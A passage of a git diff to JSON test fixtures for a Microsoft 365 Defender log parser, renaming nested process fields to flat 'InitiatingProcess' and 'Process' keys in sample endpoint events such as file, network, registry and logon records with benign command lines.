 "AccountSid": "S-1-2-3",
- "process": {
- "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
- "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
- "FileSize": 3316224,
- "LogonId": "5223047",
- "VersionInfoCompanyName": "Test Corporation",
- "VersionInfoFileDescription": "Browser EXE",
- "VersionInfoInternalFileName": "Browser.EXE",
- "VersionInfoOriginalFileName": "Browser.EXE",
- "VersionInfoProductName": "Test Product",
- "VersionInfoProductVersion": "1, 0, 0, 1"
- }
+ "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+ "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+ "InitiatingProcessFileSize": 3316224,
+ "InitiatingProcessLogonId": "5223047",
+ "InitiatingProcessVersionInfoCompanyName": "Test Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Browser EXE",
+ "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE",
+ "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE",
+ "InitiatingProcessVersionInfoProductName": "Test Product",
+ "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1"
 },
 "type": "SensitiveFileRead"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 4964dae1f..1f1351d52 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -16,9 +16,7 @@
 "@timestamp": "2024-10-22T15:09:08.851712Z",
 "action": {
 "properties": {
- "process": {
- "LogonId": "0"
- }
+ "InitiatingProcessLogonId": "0"
 },
 "type": "ScriptContent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
index c34cefa50..3292ed6fe 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:19:26.502777Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
- "CommandLine": "\"OUTLOOK.EXE\" ",
- "FileSize": 44152968,
- "LogonId": "389220681",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Outlook",
- "VersionInfoInternalFileName": "Outlook",
- "VersionInfoOriginalFileName": "Outlook.exe",
- "VersionInfoProductName": "Microsoft Outlook",
- "VersionInfoProductVersion": "16.0.17928.20216"
- }
+ "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
+ "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ",
+ "InitiatingProcessFileSize": 44152968,
+ "InitiatingProcessLogonId": "389220681",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook",
+ "InitiatingProcessVersionInfoInternalFileName": "Outlook",
+ "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Outlook",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
 },
 "type": "GetClipboardData"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
index ea0ddb0df..fea26327a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:15:59.550882Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
- "CommandLine": "powershell.exe",
- "FileSize": 450560,
- "LogonId": "398124703",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows PowerShell",
- "VersionInfoInternalFileName": "POWERSHELL",
- "VersionInfoOriginalFileName": "PowerShell.EXE",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.22621.3085"
- }
+ "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
+ "InitiatingProcessCommandLine": "powershell.exe",
+ "InitiatingProcessFileSize": 450560,
+ "InitiatingProcessLogonId": "398124703",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell",
+ "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL",
+ "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085"
 },
 "type": "PowerShellCommand"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
index 48696c644..672754009 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:17:23.330722Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
- "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
- "FileSize": 1621656,
- "LogonId": "8066492",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Word",
- "VersionInfoInternalFileName": "WinWord",
- "VersionInfoOriginalFileName": "WinWord.exe",
- "VersionInfoProductName": "Microsoft Office",
- "VersionInfoProductVersion": "16.0.17928.20216"
- }
+ "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+ "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "InitiatingProcessFileSize": 1621656,
+ "InitiatingProcessLogonId": "8066492",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Word",
+ "InitiatingProcessVersionInfoInternalFileName": "WinWord",
+ "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
 },
 "type": "ShellLinkCreateFileEvent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
index 94b70858f..7428190cf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
@@ -16,19 +16,17 @@
 "@timestamp": "2022-09-01T07:46:42.468408Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
- "FileSize": 56824728,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
- "VersionInfoInternalFileName": "OneDriveSetup.exe",
- "VersionInfoOriginalFileName": "OneDriveSetup.exe",
- "VersionInfoProductName": "Microsoft OneDrive",
- "VersionInfoProductVersion": "22.166.0807.0002"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+ "InitiatingProcessFileSize": 56824728,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+ "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
+ "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
 },
 "type": "FileDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
index 1a9daafcd..73d8718f8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
@@ -22,19 +22,17 @@
 "@timestamp": "2024-11-08T14:38:51.904876Z",
 "action": {
 "properties": {
- "RequestAccountSid": "S-1-2-3",
- "process": {
- "CommandLine": "commandexec.exe /V",
- "FileSize": 176128,
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows\u00ae installer",
- "VersionInfoInternalFileName": "commandexec",
- "VersionInfoOriginalFileName": "commandexec.exe",
- "VersionInfoProductName": "Windows Installer - Unicode",
- "VersionInfoProductVersion": "5.0.22621.3880"
- }
+ "InitiatingProcessCommandLine": "commandexec.exe /V",
+ "InitiatingProcessFileSize": 176128,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+ "InitiatingProcessVersionInfoInternalFileName": "commandexec",
+ "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe",
+ "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+ "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
+ "RequestAccountSid": "S-1-2-3"
 },
 "type": "FileCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 04559806a..497faa7bf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,12 +16,10 @@
 "@timestamp": "2022-09-01T07:47:58.616127Z",
 "action": {
 "properties": {
- "process": {
- "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
- "FileSize": 66560,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault"
- }
+ "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+ "InitiatingProcessFileSize": 66560,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
 },
 "type": "ImageLoaded"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index e70edf395..15dc7a41b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,11 +17,9 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11-1-1",
+ "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
 "LogonId": "111111",
- "LogonType": "Interactive",
- "process": {
- "CommandLine": "WinLogon.exe -SpecialSession"
- }
+ "LogonType": "Interactive"
 },
 "type": "LogonSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
index 75ab306b8..348f76f4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,21 +16,19 @@
 "@timestamp": "2023-01-04T14:05:32.314862Z",
 "action": {
 "properties": {
+ "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+ "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+ "InitiatingProcessFileSize": 63984520,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
+ "InitiatingProcessVersionInfoInternalFileName": "Excel",
+ "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
 "LocalIPType": "Private",
- "RemoteIPType": "Public",
- "process": {
- "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
- "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
- "FileSize": 63984520,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Excel",
- "VersionInfoInternalFileName": "Excel",
- "VersionInfoOriginalFileName": "Excel.exe",
- "VersionInfoProductName": "Microsoft Office",
- "VersionInfoProductVersion": "16.0.15601.20538"
- }
+ "RemoteIPType": "Public"
 },
 "type": "ConnectionSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 3847a138b..5a90081c8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,30 +17,26 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11",
+ "InitiatingProcessCommandLine": "\"MsMpEng.exe\"",
+ "InitiatingProcessFileSize": 133576,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessLogonId": "999",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable",
+ "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6",
 "LogonId": "999",
- "process": {
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
- "VersionInfoInternalFileName": "MpCmdRun",
- "VersionInfoOriginalFileName": "MpCmdRun.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "4.18.2301.6",
- "parent": {
- "CommandLine": "\"MsMpEng.exe\"",
- "FileSize": 133576,
- "IntegrityLevel": "System",
- "LogonId": "999",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Antimalware Service Executable",
- "VersionInfoInternalFileName": "MsMpEng.exe",
- "VersionInfoOriginalFileName": "MsMpEng.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "4.18.2301.6"
- }
- }
+ "ProcessIntegrityLevel": "System",
+ "ProcessTokenElevation": "TokenElevationTypeDefault",
+ "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
+ "ProcessVersionInfoInternalFileName": "MpCmdRun",
+ "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe",
+ "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "ProcessVersionInfoProductVersion": "4.18.2301.6"
 },
 "type": "ProcessCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cac1e9791..cab75fb0a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -23,30 +23,26 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-2-3",
+ "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+ "InitiatingProcessFileSize": 145408,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessLogonId": "999",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+ "InitiatingProcessVersionInfoInternalFileName": "file",
+ "InitiatingProcessVersionInfoOriginalFileName": "file.exe",
+ "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+ "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
 "LogonId": "999",
- "process": {
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Network Command Shell",
- "VersionInfoInternalFileName": "processcommand.exe",
- "VersionInfoOriginalFileName": "processcommand.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.22621.1",
- "parent": {
- "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
- "FileSize": 145408,
- "IntegrityLevel": "System",
- "LogonId": "999",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows\u00ae installer",
- "VersionInfoInternalFileName": "file",
- "VersionInfoOriginalFileName": "file.exe",
- "VersionInfoProductName": "Windows Installer - Unicode",
- "VersionInfoProductVersion": "5.0.22621.3880"
- }
- }
+ "ProcessIntegrityLevel": "System",
+ "ProcessTokenElevation": "TokenElevationTypeDefault",
+ "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "ProcessVersionInfoFileDescription": "Network Command Shell",
+ "ProcessVersionInfoInternalFileName": "processcommand.exe",
+ "ProcessVersionInfoOriginalFileName": "processcommand.exe",
+ "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "ProcessVersionInfoProductVersion": "10.0.22621.1"
 },
 "type": "ProcessCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
index 212f23549..3fe0d2cf8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
@@ -16,19 +16,17 @@
 "@timestamp": "2023-01-04T14:35:20.616193Z",
 "action": {
 "properties": {
- "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
- "process": {
- "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
- "FileSize": 445440,
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Host Process for OMA-DM Client",
- "VersionInfoInternalFileName": "omadmclient",
- "VersionInfoOriginalFileName": "omadmclient.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.19041.2193"
- }
+ "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+ "InitiatingProcessFileSize": 445440,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
+ "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
+ "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
+ "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
 },
 "type": "RegistryKeyDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index c632ebbfa..a04e0e8be 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,9 +16,7 @@
 "@timestamp": "2024-10-22T15:09:47.246794Z",
 "action": {
 "properties": {
- "process": {
- "LogonId": "0"
- }
+ "InitiatingProcessLogonId": "0"
 },
 "type": "ScriptContent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 5f3e9f9b1..294c92d60 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
@@ -17,18 +17,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
index 57b4e7abc..031a0b50a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
index e45140956..7d110bb54 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index f1753e2d7..0a0174b85 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
